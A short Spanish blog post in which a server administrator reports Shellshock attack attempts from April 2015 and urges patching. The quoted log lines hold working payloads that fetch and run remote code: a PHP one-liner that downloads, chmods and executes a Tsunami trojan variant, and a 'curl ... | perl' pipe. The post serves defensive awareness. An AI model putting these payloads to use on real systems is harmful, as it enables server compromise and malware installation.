Linux Tsunami Troyano

Un intento de ataque algo mas rebuscado que los normales…bueno rebuscado tampoco. Han debido de petar alguna maquina de OVH y lo estan haciendo a toda velocidad. Lo curioso del tema es que estan intentando subir una variante del Trojan.Tsunami.


Lo intentos de conexión hacen esto …

91.121.10.36 – – [07/Apr/2015:12:30:50 +0200] “GET /admin.cgi HTTP/1.0” 404 490 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/x/Help1\”;”$b = \”http://x5d.su/x/Help2\”;”$c = sys_get_temp_dir();”$d = \”Help1\”;”$e = \”Help2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

Intentando explotar shellshock y bajar el fichero en cuestión (el troyano). Virustotal lo identifica como ese troyano.

troyano

Y asi lleva toda la mañana … por lo menos es algo mas elaborado que los tipicos …

46.109.148.56 – – [02/Apr/2015:09:06:55 +0200] “GET /cgi-bin/astrocam.cgi HTTP/1.0” 404 538 “() { :; }; curl http://54.248.244.82/test.pl | perl” “() { :; }; curl http://54.248.244.82/test.pl | perl”

En fin … que la recomendación es la de siempre … parchea … parchea y parchea…

Comments are closed.